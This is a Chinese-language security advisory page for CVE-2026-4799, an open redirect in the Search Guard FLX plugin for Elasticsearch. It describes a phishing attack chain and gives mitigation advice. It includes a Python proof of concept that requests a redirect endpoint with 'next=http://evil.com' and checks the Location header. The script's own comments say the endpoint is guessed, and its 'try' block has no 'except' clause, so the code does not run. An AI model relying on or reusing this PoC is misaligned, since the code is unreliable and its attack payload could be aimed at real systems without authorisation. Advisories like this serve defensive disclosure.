CVE-2026-4799 CVSS 4.3 中危

CVE-2026-4799 Search Guard FLX 开放重定向漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4799

漏洞类型

开放重定向

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Search Guard FLX

漏洞概述

Search Guard FLX 是一款用于 Elasticsearch 的安全插件。在版本 4.0.1 及更早版本中，系统存在开放重定向漏洞。攻击者可以通过精心构造的特制请求，诱导应用程序将用户重定向至不受信任的第三方 URL。由于该漏洞需要用户交互（UI:R），它常被用于网络钓鱼攻击，利用受害者的信任窃取凭证或敏感信息，对系统机密性造成低级威胁。

技术细节

该漏洞的成因在于 Search Guard FLX 在处理特定 HTTP 请求时，未对重定向目标参数进行严格的校验和过滤。攻击者可以利用包含恶意 URL 的请求参数（例如 `redirect`、`url` 或 `next`）来绕过安全检查。当受害者访问攻击者精心构造的链接时，服务器会返回 302 或 301 重定向响应，Location 头部被设置为攻击者指定的恶意地址。虽然漏洞本身不直接破坏服务器端的完整性或可用性，但结合社会工程学，攻击者可利用合法域名（Search Guard 所在域名）的信任度，将用户引导至伪造的登录页面，进而窃取认证令牌或个人数据。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用的是 Search Guard FLX 4.0.1 或更低版本。

STEP 2

载荷制作

攻击者构造一个包含恶意 URL 参数的特制 HTTP 链接，该链接旨在触发目标应用的重定向机制。

STEP 3

社会工程学传递

攻击者通过钓鱼邮件或即时通讯软件将恶意链接发送给目标用户，诱导其点击。

STEP 4

利用重定向

受害者点击链接后，浏览器向 Search Guard 发起请求，服务器响应 302 重定向，将受害者带往攻击者控制的恶意站点。

STEP 5

后续攻击

受害者在恶意站点上可能被诱导输入凭据或下载恶意软件，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-4799: Search Guard FLX Open Redirect
# This script demonstrates the vulnerability by checking for a redirect to an external domain.

import requests

def check_open_redirect(target_host):
    # The vulnerable endpoint and parameter might vary; this is a generic example.
    # Based on the description, we craft a URL that attempts to redirect externally.
    malicious_url = "http://evil.com"
    
    # Example payload structure (actual endpoint needs to be verified against specific version)
    # Assuming a common vulnerable parameter pattern like 'url' or 'redirect'
    target_url = f"{target_host}/_searchguard/redirect?next={malicious_url}"
    
    try:
        # Send request, do not follow redirects to inspect the response header
        response = requests.get(target_url, allow_redirects=False, timeout=5)
        
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location')
            if location and "evil.com" in location:
                print(f"[+] Vulnerability Confirmed! Redirecting to: {location}")
                return True
        
        print(f"[-] Not vulnerable or payload incorrect. Status: {response.status_code}")
        return False

if __name__ == "__main__":
    target = "http://localhost:9200" # Replace with actual target
    check_open_redirect(target)

影响范围

Search Guard FLX <= 4.0.1

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界设备（如反向代理或 WAF）上配置规则，检查 HTTP 响应头中的 Location 字段，阻止指向非白名单域名的重定向。同时，加强对最终用户的安全意识培训，不轻易点击来源不明的链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表